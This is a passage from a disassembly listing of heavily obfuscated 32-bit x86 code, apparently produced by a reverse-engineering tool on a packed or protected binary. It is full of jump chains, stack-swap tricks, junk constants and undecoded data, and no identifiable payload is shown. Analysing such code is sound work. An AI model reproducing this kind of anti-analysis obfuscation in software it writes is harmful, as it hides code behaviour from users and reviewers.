; ---------------------------------------------------------------------------
		align 10h
		db 0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48CFEF

loc_48A7A1:				; CODE XREF: sub_48CFEF+1BBCj
		jmp	nullsub_583
; END OF FUNCTION CHUNK	FOR sub_48CFEF
; ---------------------------------------------------------------------------
		db 0
; ---------------------------------------------------------------------------

loc_48A7A7:				; DATA XREF: sub_48DE75+AFo
		xchg	esi, [esp]
		jmp	loc_489C5B
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_611. PRESS KEYPAD	"+" TO EXPAND]
		dd 5AE90000h		; CODE XREF: eu81y7qg:0048E6DBj
		db 44h,	2 dup(0)
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48B258

loc_48A7B7:				; CODE XREF: sub_48B258+Aj
		jmp	loc_48CF4C
; END OF FUNCTION CHUNK	FOR sub_48B258
; ---------------------------------------------------------------------------
		db 0
; ---------------------------------------------------------------------------

loc_48A7BD:				; CODE XREF: eu81y7qg:loc_489C5Bj
					; eu81y7qg:loc_48D9F9j
		push	ebp
		mov	ebp, esp
		push	ecx
		jmp	loc_48CD8F
; ---------------------------------------------------------------------------
		db 0
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_600. PRESS KEYPAD	"+" TO EXPAND]
		db 0
; ---------------------------------------------------------------------------

loc_48A7C9:				; CODE XREF: eu81y7qg:0048D634j
		jmp	locret_48DA66
; ---------------------------------------------------------------------------

loc_48A7CE:				; DATA XREF: sub_48ED10:loc_48A0DAo
		xchg	ebx, [esp]
		jmp	loc_48B129
; ---------------------------------------------------------------------------
		align 4
		jmp	loc_489EFD
; ---------------------------------------------------------------------------
		db 2 dup(0), 0Fh
		dd 3E0884h, 0F1B3E900h,	6800FFFFh, 48A3FEh, 42F0E9h, 4D8B0000h
					; CODE XREF: sub_48DE75-AD2j
		dd 0A0E99D00h, 9, 58240487h, 68C0319Dh,	48DA28h, 3210E9h
		db 0
; ---------------------------------------------------------------------------

locret_48A811:				; CODE XREF: eu81y7qg:0048982Ej
		retn
; ---------------------------------------------------------------------------
		dw 0E900h
		dd 1DAAh, 0FFEE01E9h, 5E800FFh,	30h, 343EE900h,	0E9000000h
		dd 0FFFFF235h, 12E0840Fh, 80E90000h, 14h, 5F243C87h, 87C88B51h
		dd 9E68240Ch, 58E88001h, 0E91AC0C1h, 0FFFFFE1Bh, 0C159C18Bh
		dd 0C8811DC0h, 0A55BA5ECh, 9E0CE881h, 0D7E91CE7h, 45h
		dd 0
		dd offset sub_48F057
		db 2 dup(0)
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48B258

loc_48A876:				; CODE XREF: sub_48B258-756j
		jmp	loc_489932
; END OF FUNCTION CHUNK	FOR sub_48B258
; ---------------------------------------------------------------------------
		align 10h
		dd 116h, 0
; ---------------------------------------------------------------------------
		and	cl, ss:[edx-10h]
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_610. PRESS KEYPAD	"+" TO EXPAND]
		align 2
		not	ebx
		jmp	loc_48B791

; =============== S U B	R O U T	I N E =======================================



sub_48A895	proc near		; CODE XREF: eu81y7qg:0048CBD1p
					; sub_48DE75+795j

; FUNCTION CHUNK AT 00489CFC SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0048C0D7 SIZE 00000005 BYTES

		xchg	edi, [esp+0]
		xchg	edx, [esp+0]
		mov	edi, edx
		pop	edx
		mov	eax, [eax]
		jmp	loc_489CFC
sub_48A895	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		call	loc_48E1B2
; START	OF FUNCTION CHUNK FOR sub_48E71D

loc_48A8AA:				; CODE XREF: sub_48E71D-CD0j
		jmp	nullsub_594
; END OF FUNCTION CHUNK	FOR sub_48E71D
; ---------------------------------------------------------------------------
		jmp	locret_48C450
; ---------------------------------------------------------------------------
		db 2 dup(0)
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_608. PRESS KEYPAD	"+" TO EXPAND]
		align 4
		db 0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48DE75

loc_48A8B9:				; CODE XREF: sub_48DE75:loc_48DF29j
		jmp	nullsub_573
; END OF FUNCTION CHUNK	FOR sub_48DE75

; =============== S U B	R O U T	I N E =======================================



sub_48A8BE	proc near		; DATA XREF: sub_48BE6F:loc_4894ECo

; FUNCTION CHUNK AT 00489660 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0048AFF0 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0048B70D SIZE 00000013 BYTES

		add	eax, 971h
		push	ecx
		pushf
		push	42BB4D20h
		jmp	loc_48AFF0
sub_48A8BE	endp

; ---------------------------------------------------------------------------
		db 2 dup(0)
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48CEBF

loc_48A8D2:				; CODE XREF: sub_48CEBF-2F6Bj
					; sub_48DE75+D8j
		push	offset loc_48C846
		jmp	nullsub_571
; END OF FUNCTION CHUNK	FOR sub_48CEBF
; ---------------------------------------------------------------------------
		db 2 dup(0)
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48DE75

loc_48A8DE:				; CODE XREF: sub_48DE75:loc_489F72j
		push	891FE80Fh
		pop	eax
		push	esi
		mov	esi, offset loc_48C412
		jmp	loc_489C41
; END OF FUNCTION CHUNK	FOR sub_48DE75
; ---------------------------------------------------------------------------
		align 10h
		dd 12E9C300h, 7, 3EFDE900h, 0 ;	CODE XREF: eu81y7qg:0048EB9Fj
		dd 58240487h, 0CED1C681h, 4DE8EF79h, 3Dh
		dd 8B243487h, 84905EDEh, 0FFFFFEC3h, 48E49868h,	0F0CFE900h
					; DATA XREF: sub_48AE52+4o
		dd 0FFFFh, 0F82B2E8Bh, 1DA4E9h,	9DFE8100h, 0E99DBDFCh
		dd 0FFFFFD6Ch, 0D68B0000h, 4D98685Eh, 0C158A121h, 0E0810BC0h
		dd 0CD1D9EA3h, 3F98E8h,	1101E900h
		db 3 dup(0)
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48DE75

loc_48A95B:				; CODE XREF: sub_48DE75:loc_48BDA3j
		jmp	loc_48C659
; END OF FUNCTION CHUNK	FOR sub_48DE75
; ---------------------------------------------------------------------------
		dd 27ABE900h, 0
; ---------------------------------------------------------------------------
		retn
; ---------------------------------------------------------------------------
		align 2

; =============== S U B	R O U T	I N E =======================================



sub_48A96A	proc near		; CODE XREF: eu81y7qg:004895E1p
		xchg	ebx, [esp+0]
		pop	ebx
		push	0D3F37790h
		push	(offset	loc_48978A+1)
		jmp	nullsub_557
sub_48A96A	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48DE75

loc_48A97D:				; CODE XREF: sub_48DE75-308Aj
		pop	eax
		push	offset sub_48C515
		jmp	loc_48EB63
; END OF FUNCTION CHUNK	FOR sub_48DE75
; ---------------------------------------------------------------------------
		db 0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48C27A

loc_48A989:				; CODE XREF: sub_48C27A+E92j
		add	edx, 1BC3805Eh
		jmp	loc_48BFFD
; END OF FUNCTION CHUNK	FOR sub_48C27A
; ---------------------------------------------------------------------------

loc_48A994:				; CODE XREF: eu81y7qg:0048AD35j
		mov	byte ptr [edi],	9
		xchg	eax, [esp]
		mov	edi, eax
		pop	eax
		mov	eax, cs
		xor	al, al

loc_48A9A1:				; DATA XREF: eu81y7qg:0048AD30o
		or	eax, eax
		jz	loc_48C671
		jmp	near ptr dword_489508+3Fh
; ---------------------------------------------------------------------------
		align 10h
		jnp	loc_48D327
		jmp	sub_48D2B3
; ---------------------------------------------------------------------------
		align 4

loc_48A9BC:				; CODE XREF: eu81y7qg:0048D24Ej
					; eu81y7qg:0048EABFj
		jnz	loc_48CF00
		jmp	loc_48B8FC
; ---------------------------------------------------------------------------
		align 4
		dd 0C26C6800h, 3487C265h, 8B575E24h, 243C87FEh,	19D6E9h
		dd 0C3000000h, 1F1FE9h,	94E90000h, 8B000017h, 0F6815FF7h
		dd 53EF243Bh, 235EFE81h, 0CDE9CEFEh, 87000012h,	0D568242Ch
		dd 5AB85966h, 74B1CA81h, 0F281B4D7h, 0E94F0D2Ah, 8111C2C1h
		dd 89F602C2h, 35C6E908h, 58000000h
; ---------------------------------------------------------------------------
		xchg	edx, [esp]

loc_48AA27:				; CODE XREF: eu81y7qg:loc_48EAEAj
		mov	ebp, edx
		pop	edx
		retn
; ---------------------------------------------------------------------------
		align 4

loc_48AA2C:				; CODE XREF: eu81y7qg:0048D6E4j
		jmp	loc_48BE04
; ---------------------------------------------------------------------------
		align 2

loc_48AA32:				; CODE XREF: eu81y7qg:0048DA54j
		push	dword ptr [ebp-4]
		push	offset byte_48E365
		jmp	loc_48BE11
; ---------------------------------------------------------------------------
		align 10h
		dd 24148700h, 8B243C87h, 10685FD7h, 582EDAFAh, 3256E9h
					; CODE XREF: eu81y7qg:loc_48EC83p
		dd 0DE850000h, 424BE9h
		db 0
; ---------------------------------------------------------------------------

loc_48AA5D:				; CODE XREF: eu81y7qg:loc_48A04Fj
		rol	eax, 10h
		cmp	eax, 338813C4h
		jmp	loc_48CB7C
; ---------------------------------------------------------------------------
		align 4
		dd 0E9D98700h, 3D63h, 6FA1DF81h, 0EFE97C3Bh, 5,	0C1C1EE33h
		dd 9BE28113h, 818C2EAAh, 7A0C5CC0h, 97EE8E0h, 0B9E90000h
		dd 43h,	0C300C35Bh, 0DB91D9D5h,	0E9241C87h, 3FC9h
byte_48AAAC	db 8Bh,	0F0h, 58h	; DATA XREF: eu81y7qg:0048D4DEo
byte_48AAAF	db 0B5h			; DATA XREF: sub_48DE75+308o
		dd 0EF0AE800h, 0E900FFFFh, 34F3h, 0C30000h, 822E9h, 74C28100h
					; CODE XREF: eu81y7qg:0048EE13j
		dd 87B24029h, 64E92414h, 2Dh, 0C9E857h,	0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48B258

loc_48AADC:				; CODE XREF: sub_48B258+1C48j
		jl	loc_48D86F
		add	[ecx-42AD5B0Bh], al
		call	near ptr 3231BC74h
		sbb	al, [eax]
		add	[ecx+5ABBD2CAh], al
		lodsd
		and	edx, 0C56F78F6h
		test	edx, 100000h
		jmp	loc_48A876
; END OF FUNCTION CHUNK	FOR sub_48B258
; ---------------------------------------------------------------------------
		align 4
		xor	ecx, 621DEBB1h
		or	ecx, 5920DF67h
		add	ecx, 205DD0CDh
		xchg	ecx, [esp]
		jmp	nullsub_555
; ---------------------------------------------------------------------------
		align 4
		not	ebp
		pushf
		jmp	loc_48B547
; ---------------------------------------------------------------------------
		xchg	eax, [esp]
		xchg	esi, [esp]
		mov	eax, esi
		pop	esi
		push	edi
		jmp	loc_48EB49
; ---------------------------------------------------------------------------
		align 4

loc_48AB3C:				; DATA XREF: sub_48C117:loc_48B4A1o
		push	489C03h
		jmp	loc_48E50D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48D725

loc_48AB46:				; CODE XREF: sub_48D725:loc_48B1C0j
		pop	eax
		or	eax, 6AEB497Eh
		sub	eax, 0E32FC868h
		or	eax, 8FB8D9EEh
		jmp	loc_48A71E
; END OF FUNCTION CHUNK	FOR sub_48D725
; ---------------------------------------------------------------------------
word_48AB5E	dw 0C281h		; DATA XREF: eu81y7qg:0048C96Fo
		dd 8072D7E1h, 43E8128Bh, 41h, 813B8700h, 7E2701E6h, 3406E9E2h
		dd 81000000h, 3312FEAh,	0F78DE92Dh, 0FFFFh

; =============== S U B	R O U T	I N E =======================================



sub_48AB88	proc near		; CODE XREF: eu81y7qg:0048BE41j
					; eu81y7qg:0048EB79p

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0048AD69 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0048B9A8 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0048C062 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0048D09B SIZE 0000000A BYTES

		xchg	ebx, [esp+0]
		pop	ebx
		xchg	esi, [esp-4+arg_0]
		mov	ebx, esi
		pop	esi
		push	eax
		mov	eax, ebp
		push	esi
		jmp	loc_48C062
sub_48AB88	endp

; ---------------------------------------------------------------------------
		align 4
		dd 0FC8F0F00h, 87000028h, 685B241Ch, 0C52FDC5Ah, 0B5F7815Fh
		dd 0C1A54145h, 0EF8106C7h, 0BAEFF6C0h, 1297E9h,	0BD98B00h
		dd 3D23E9CAh, 0
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_584. PRESS KEYPAD	"+" TO EXPAND]
		db 2 dup(0), 68h	; CODE XREF: eu81y7qg:loc_48EEA8j
; ---------------------------------------------------------------------------
		pop	ebx
		mov	bh, 57h
		pop	esi
		pop	ecx
		and	ecx, 2E843AB7h
		add	ecx, 0F2446E91h
		jmp	loc_48E84E
; ---------------------------------------------------------------------------
		dw 6800h
		dd 0E120B9E4h, 8B242C87h, 0CA815DD5h, 0B4651D79h, 37E2C281h
		dd 0C2C148B1h, 7EE2810Ch, 0E95E0A8Dh, 273Eh
		db 2 dup(0)
; ---------------------------------------------------------------------------

loc_48AC0E:				; DATA XREF: sub_48DE75-2D45o
		xchg	edx, [esp]
		push	offset byte_48EB23
		jmp	loc_4897E3
; ---------------------------------------------------------------------------
		jg	loc_48B1CA

; =============== S U B	R O U T	I N E =======================================



sub_48AC21	proc near		; CODE XREF: eu81y7qg:0048C909p
		xchg	edx, [esp+0]
		pop	edx
		pushf
		jmp	loc_48E508
sub_48AC21	endp

; ---------------------------------------------------------------------------
		retn
; ---------------------------------------------------------------------------
		dd 0CE810000h, 0FF25B802h, 977BE681h, 0C681A55Bh, 5B0752E0h
		dd 0FFFBD9E9h, 0C30000FFh, 6DE90000h, 36h
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48DE75

loc_48AC50:				; CODE XREF: sub_48DE75+1AAj
		jmp	loc_48C3BD
; END OF FUNCTION CHUNK	FOR sub_48DE75
; ---------------------------------------------------------------------------
		db 2 dup(0), 0Fh
		dd 0FFF5CA82h
		db 0FFh

; =============== S U B	R O U T	I N E =======================================



sub_48AC5D	proc near		; CODE XREF: sub_48DE75-2A6Dp
		xchg	ebx, [esp+0]
		xchg	ecx, [esp+0]
		mov	ebx, ecx
		pop	ecx
		xor	ecx, 0AE4B22DFh
		jmp	loc_48E530
sub_48AC5D	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		align 2
		mov	ebp, [ebx]
		jmp	loc_48D1D0
; ---------------------------------------------------------------------------

loc_48AC79:				; CODE XREF: eu81y7qg:0048B16Cj
		mov	eax, offset loc_48E44E
		jmp	loc_48E6AB
; ---------------------------------------------------------------------------
		align 4

loc_48AC84:				; CODE XREF: eu81y7qg:loc_48B457j
		xchg	esi, [esp]
		mov	ebx, esi
		pop	esi
		or	ebx, 86FC0F89h
		jmp	loc_48E73B
; ---------------------------------------------------------------------------
		db 2 dup(0), 0E8h
		dd 416Ch
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48E9EE

loc_48AC9C:				; CODE XREF: sub_48E9EE-11j
		and	edx, 3C21C426h
		add	edx, 706611BFh
		rol	edx, 8
		push	offset dword_48DBBC
		jmp	loc_48A1B5
; END OF FUNCTION CHUNK	FOR sub_48E9EE
; ---------------------------------------------------------------------------
		db 2 dup(0), 0C3h
		db 0
; ---------------------------------------------------------------------------

loc_48ACB9:				; CODE XREF: eu81y7qg:0048A39Cj
		jmp	locret_48B1D6
; ---------------------------------------------------------------------------
		dw 0C300h
		dd 4870000h, 0BA525824h, 48C160h, 0FFF3EEE9h, 0E1C100FFh
		dd 788D0F12h, 0E9000018h, 935h
		db 2 dup(0)
; ---------------------------------------------------------------------------

loc_48ACE2:				; CODE XREF: eu81y7qg:0048A6ECj
		mov	byte ptr [ebx],	3
		xchg	edi, [esp]
		mov	ebx, edi
		rol	edi, 13h
		jmp	loc_48A3A2
; ---------------------------------------------------------------------------
		align 4
		jge	loc_48B79E
		jmp	loc_48D647
; ---------------------------------------------------------------------------
		align 10h
		db 0
; ---------------------------------------------------------------------------

locret_48AD01:				; CODE XREF: eu81y7qg:loc_48E9B2j
		retn
; ---------------------------------------------------------------------------
		db 0
; ---------------------------------------------------------------------------

loc_48AD03:				; DATA XREF: eu81y7qg:00489D0Co
		push	offset byte_48CDED
		jmp	loc_48B516
; ---------------------------------------------------------------------------
		and	edi, 0FB203CE1h
		rol	edi, 1Eh
		or	edi, 2C1B94C4h
		test	edi, 100000h
		jmp	loc_48A69C
; ---------------------------------------------------------------------------
		retn
; ---------------------------------------------------------------------------
		db 0
; ---------------------------------------------------------------------------

loc_48AD29:				; CODE XREF: eu81y7qg:00489DC2j
		jmp	loc_48DE3C
; ---------------------------------------------------------------------------
		db 0
; ---------------------------------------------------------------------------

loc_48AD2F:				; CODE XREF: eu81y7qg:00489B37j
		push	edi
		mov	edi, offset loc_48A9A1
		jmp	loc_48A994
; ---------------------------------------------------------------------------
		cmp	esi, 97D865BDh
		jmp	loc_48EBB0
; ---------------------------------------------------------------------------
		db 2 dup(0), 1Bh
		db 0DEh

; =============== S U B	R O U T	I N E =======================================



sub_48AD49	proc near		; CODE XREF: sub_48DE75:loc_48ADCDp

; FUNCTION CHUNK AT 0048CF1F SIZE 00000005 BYTES

		xchg	esi, [esp+0]
		xchg	edi, [esp+0]
		mov	esi, edi
		jmp	loc_48CF1F
sub_48AD49	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48DE75

loc_48AD56:				; CODE XREF: sub_48DE75+43Bj
		push	offset sub_48D9C3
		jmp	loc_48B976
; END OF FUNCTION CHUNK	FOR sub_48DE75
; ---------------------------------------------------------------------------
		dd 0E95B0000h, 631h
		db 0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48AB88

loc_48AD69:				; CODE XREF: sub_48AB88:loc_48B9A8j
		mov	byte ptr [esi],	8Dh
		pop	esi
		push	offset byte_48B213
		jmp	nullsub_572
; END OF FUNCTION CHUNK	FOR sub_48AB88
; ---------------------------------------------------------------------------
		align 4
		dd 49E08100h, 0C1783782h, 0E88113C0h, 0EDA33854h, 2FFBC081h
		dd 0B6E9EBA2h, 32h, 101C600h, 0A3946859h, 82E90048h, 0FFFFE9h
		dd 0A03DC081h, 0C723C96Fh, 0A1E9h, 0F000000h, 255B8Ch
		dd 0E9DA0B00h, 2B12h, 0A8F18100h, 0E94AA025h, 0BB9h
		db 0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48DE75

loc_48ADCD:				; CODE XREF: sub_48DE75+44j
		call	sub_48AD49
		add	cl, al
		enter	0FFFFE91Ah, 1
		cmc
; END OF FUNCTION CHUNK	FOR sub_48DE75
; ---------------------------------------------------------------------------
		db 2 dup(0FFh),	0
		db 0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48DE75

loc_48ADDD:				; CODE XREF: sub_48DE75:loc_4897D9j
		push	esi
		mov	esi, ecx
		xchg	esi, [esp+0]
		mov	[ebp-4], eax
		push	503BA4B9h
		jmp	loc_48A97D
; END OF FUNCTION CHUNK	FOR sub_48DE75
; ---------------------------------------------------------------------------
		dd 8CE93A89h
		db 0EFh, 2 dup(0FFh)
byte_48ADF7	db 0C6h			; DATA XREF: eu81y7qg:0048A184o
; ---------------------------------------------------------------------------
		pop	es
		call	fword ptr [edi+68h]
		wait
		retn
; ---------------------------------------------------------------------------
		dw 48h
		dd 0FFF8B4E9h, 5A0000FFh, 48D14268h, 4049E900h,	0
		dd 0C15DF58Bh, 0F68113C6h, 9187E3B0h, 4EE7E681h, 67E8CF23h
		dd 0FFFFE6h
; ---------------------------------------------------------------------------

locret_48AE2C:				; CODE XREF: eu81y7qg:loc_4897E3j
		retn
; ---------------------------------------------------------------------------
		align 2
		pop	ebx
		rol	ebx, 15h
		and	ebx, 0FA151BBDh
; START	OF FUNCTION CHUNK FOR sub_48DE75

loc_48AE38:				; CODE XREF: sub_48DE75:loc_48E32Ej
		test	ebx, 10h
		jmp	loc_48C4BD
; END OF FUNCTION CHUNK	FOR sub_48DE75
; ---------------------------------------------------------------------------
		align 4
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_582. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48B559

loc_48AE45:				; CODE XREF: sub_48B559+12j
		jmp	loc_48A05B
; END OF FUNCTION CHUNK	FOR sub_48B559
; ---------------------------------------------------------------------------
		db 0
; ---------------------------------------------------------------------------

loc_48AE4B:				; CODE XREF: eu81y7qg:0048D3CFj
		call	sub_48EC13
; ---------------------------------------------------------------------------
		db 2 dup(0)

; =============== S U B	R O U T	I N E =======================================



sub_48AE52	proc near		; CODE XREF: sub_48DE75+576p

; FUNCTION CHUNK AT 0048D225 SIZE 00000005 BYTES

		xchg	ecx, [esp+0]
		pop	ecx
		push	offset dword_48A910
		jmp	loc_48D225
sub_48AE52	endp

; ---------------------------------------------------------------------------
		db 2 dup(0)
; ---------------------------------------------------------------------------

loc_48AE62:				; DATA XREF: sub_4894C2+1Ao
		call	sub_48ED10
		jge	loc_48CA49
		pop	eax
		cmp	edx, edi
		jmp	loc_48CA3D
; ---------------------------------------------------------------------------
		xor	eax, ecx
		jmp	sub_48A09A
; ---------------------------------------------------------------------------
		dd 8B5B0000h, 0FC00800h, 23E684h, 6850F00h, 0E900002Eh
		dd 15BDh, 1A1B8D0Fh, 0D9230000h, 935BC781h
; ---------------------------------------------------------------------------
		cmp	al, [ebx]

loc_48AEA2:				; DATA XREF: eu81y7qg:0048A4D8o
		lodsb
		stc
		add	edi, 0CD075E4h
		jmp	loc_48BA07
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_572. PRESS KEYPAD	"+" TO EXPAND]
		dd 0C30000h		; CODE XREF: sub_48ED5B+Dj
; ---------------------------------------------------------------------------
		popf

; =============== S U B	R O U T	I N E =======================================



sub_48AEB5	proc near		; CODE XREF: sub_48E9EE-29p

var_4		= dword	ptr -4
arg_8		= dword	ptr  0Ch

; FUNCTION CHUNK AT 00489851 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 004899FA SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0048B172 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 0048B38C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0048C733 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 0048DC45 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0048E89C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0048EA7C SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0048EAB2 SIZE 00000005 BYTES

		xchg	ecx, [esp+0]
		pop	ecx
		add	esp, 4
		call	sub_48D33E

loc_48AEC1:				; CODE XREF: sub_48D725-2FFBj
		jmp	loc_4899FA
sub_48AEB5	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		xchg	esi, [esp]
		push	4EEC7CB3h
		pop	edx
		rol	edx, 12h
		add	edx, 0F496A816h
		add	edx, ebp
		jmp	loc_48DA60
; ---------------------------------------------------------------------------
		align 10h
		dd 0F8E9C300h, 0E9FFFFFAh, 386Fh, 24048700h, 1D75E9h, 0E8000000h
		dd 202Ah, 59FE900h, 34870000h, 2C65E24h, 0E0E85AC3h, 0C600003Fh
		dd 48CB5F05h, 5C60F00h,	48E794h, 0F305C6E8h, 870048C6h
		dd 0C6F605C6h, 0C65B0048h, 48C6F705h, 0F0E90F00h, 0FFFFFDh
		db 0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48DE75

loc_48AF39:				; CODE XREF: sub_48DE75:loc_48D926j
		mov	byte ptr [ecx],	9Ch
		pop	ecx
		or	eax, 0B90587A2h
		xor	eax, 0FFEFBFDBh
		push	offset loc_48B298
		jmp	loc_48D1AA
; END OF FUNCTION CHUNK	FOR sub_48DE75
; ---------------------------------------------------------------------------
		retn
; ---------------------------------------------------------------------------
dword_48AF54	dd 2CF38100h, 817A199Fh, 7D41B7E3h, 0E4C381CBh,	3598624h
					; CODE XREF: sub_48BA3A:loc_48D077j
		dd 3997E9DDh, 56000000h, 0A4D76853h, 0B9E90048h, 25h, 0EFA9800Fh
		dd 0B951FFFFh, 48B87Ah,	1244E9h, 68000000h, 7188DEA8h
		dd 59240C87h, 8B243C87h, 0E99C5FF7h, 69Bh, 0AEEE815Eh
		dd 0F76C9505h, 400000C6h, 0EF13E900h
		db 2 dup(0FFh),	0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48CE11

loc_48AFB7:				; CODE XREF: sub_48CE11:loc_489ADFj
		and	edx, 0F82EBE1Bh
		xor	edx, 3C1CC06Eh
		add	edx, 542DFAC5h
		jmp	loc_48A4F3
; END OF FUNCTION CHUNK	FOR sub_48CE11
; ---------------------------------------------------------------------------
		align 10h
		sub	esi, edx
; START	OF FUNCTION CHUNK FOR sub_48DE75

loc_48AFD2:				; CODE XREF: sub_48DE75-1AB4j
		add	ecx, 5183C246h
		popf
		mov	ecx, [ecx]
		jmp	loc_48BB93
; END OF FUNCTION CHUNK	FOR sub_48DE75
; ---------------------------------------------------------------------------
		retn
; ---------------------------------------------------------------------------
		db 2 dup(0), 0E9h
		dd 12B7h, 3EEEE900h, 0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48A8BE

loc_48AFF0:				; CODE XREF: sub_48A8BE+Dj
		push	eax
		mov	eax, offset loc_48E980
		jmp	loc_489660
; END OF FUNCTION CHUNK	FOR sub_48A8BE
; ---------------------------------------------------------------------------
		align 4
		db 0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48CF7E

loc_48AFFD:				; CODE XREF: sub_48CF7E+Ej
		jz	loc_48C84C
		jmp	loc_48E7F3
; END OF FUNCTION CHUNK	FOR sub_48CF7E
; ---------------------------------------------------------------------------
		dd 0C300h
; ---------------------------------------------------------------------------

loc_48B00C:				; CODE XREF: eu81y7qg:0048D75Cj
		jmp	loc_48E40D
; ---------------------------------------------------------------------------
		db 2 dup(0), 64h
		dd 30058Bh, 7EE80000h, 0FFFFE6h, 21EB830Fh, 0F5810000h
		dd 0A7079A9Ah, 0FFE91BE9h
; ---------------------------------------------------------------------------
		inc	dword ptr [eax]

loc_48B032:				; CODE XREF: eu81y7qg:00489890j
		xchg	eax, [esp]
		mov	esi, eax
		xchg	edi, [esp]
		mov	eax, edi
		pop	edi
		push	9E6E7B94h
		pop	eax
		jmp	loc_48EA90
; ---------------------------------------------------------------------------
		dd 0B6C36800h, 815A68B8h, 0C75C0BF2h, 65FA8173h, 0E97A826Fh
		dd 18B3h
		db 0
; ---------------------------------------------------------------------------

loc_48B061:				; CODE XREF: eu81y7qg:loc_48CD8Fj
		call	sub_48C693
		add	cl, ch
		jnz	short loc_48B0A0
; ---------------------------------------------------------------------------
		dw 0
		dd 8D0F0000h, 218Dh, 0BE8BB951h, 82E90048h
		db 34h,	2 dup(0)
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48DE75

loc_48B07F:				; CODE XREF: sub_48DE75-3B67j
		cmp	ebx, 2CD72EE6h
		jmp	loc_48EC34
; END OF FUNCTION CHUNK	FOR sub_48DE75
; ---------------------------------------------------------------------------
		align 4
		db  87h	; ‡
		db  0Ch
		db  24h	; $
		db  59h	; Y
		db  9Dh	; 
		db  68h	; h
		db    0
		db 0E1h	; á
		db  48h	; H
		db    0
		db 0E9h	; é
		db  0Bh
		db  2Ch	; ,
		db    0
		db    0
		align 4
		db 0
; ---------------------------------------------------------------------------

loc_48B09D:				; CODE XREF: eu81y7qg:loc_48B49Aj
		mov	edx, ecx
; ---------------------------------------------------------------------------
		db 68h
; ---------------------------------------------------------------------------

loc_48B0A0:				; CODE XREF: eu81y7qg:0048B068j
		dec	edx
		fmul	dword ptr [eax+0]
		jmp	locret_48E500
; ---------------------------------------------------------------------------
		retn
; ---------------------------------------------------------------------------
		db 0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48A70F

loc_48B0AB:				; CODE XREF: sub_48A70F+Aj
		jmp	loc_4899CB
; END OF FUNCTION CHUNK	FOR sub_48A70F
; ---------------------------------------------------------------------------
		rol	ebx, 5
		xor	edx, ebp
		adc	edi, ebp

loc_48B0B7:				; CODE XREF: eu81y7qg:loc_48C99Dj
		and	edi, 6730D3FAh
		xor	edi, 0A8A44719h
		or	edi, 0A7407630h
		jmp	loc_48CF1A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48A5B4

loc_48B0CE:				; CODE XREF: sub_48A5B4+284Dj
		xor	edi, 0A7A4D698h
		or	edi, 9AC9F401h
		push	ebx
		mov	ebx, offset byte_48C8C1
		jmp	loc_48CBDD
; END OF FUNCTION CHUNK	FOR sub_48A5B4
; ---------------------------------------------------------------------------
		align 2

locret_48B0E6:				; CODE XREF: eu81y7qg:loc_48A3EAj
		retn
; ---------------------------------------------------------------------------
		align 4
		dd 20ADE900h, 0F000000h, 0E1D82h, 4D8B00h, 0EBC1EF0Bh
		dd 9FF6811Ah, 812991F7h, 7CB28EFEh, 0FDD9E9BAh
		db 2 dup(0FFh)
; ---------------------------------------------------------------------------

loc_48B10E:				; DATA XREF: eu81y7qg:0048C0C3o
		call	loc_48D7E0

loc_48B113:				; CODE XREF: eu81y7qg:0048E67Bj
		jmp	loc_489AF8
; ---------------------------------------------------------------------------

loc_48B118:				; CODE XREF: eu81y7qg:loc_48ED01j
		call	loc_48D4F2

loc_48B11D:				; CODE XREF: eu81y7qg:0048DE06j
